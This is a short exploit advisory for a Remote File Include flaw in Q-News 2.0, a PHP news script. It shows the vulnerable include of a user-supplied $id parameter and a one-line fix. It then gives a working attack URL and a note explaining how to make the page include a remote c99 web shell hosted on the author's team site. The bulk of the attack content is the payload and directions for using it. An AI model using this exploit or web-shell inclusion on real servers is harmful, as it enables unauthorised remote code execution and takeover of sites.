## Owner : Pr0T3cT10n
## Email : Pr0T3cT10n@Gmail.Com
## Homepage : www.kamikaz-team.com
## Script site : http://q-news.sourceforge.net/
## Script name : Q-News - Quick News Generator
## Version : 2.0
## Type : RFI(Remote File Include)
## Source : http://sourceforge.net/project/showfiles.php?group_id=80306
## D0rk : not found :(
## Vuln code :
<?php
if (!isset($id)){ $id="main"; }
include ("$id.php");
if(!isset($nolinks)) { include('link.php'); }
?>
## Fix :
<?php
if (!isset($id)){ $id="main"; }
include ("./$id.php");
if(!isset($nolinks)) { include('link.php'); }
?>
## Bug :
## Files :
## /q-news.php
## Exploit :
## /q-news.php?id=[shell]
** NOTE : You need to put the shell : [/q-news.php?id=http://www.kamikaz-team.com/c99] without any extension, in your server you have to put the .php extension. **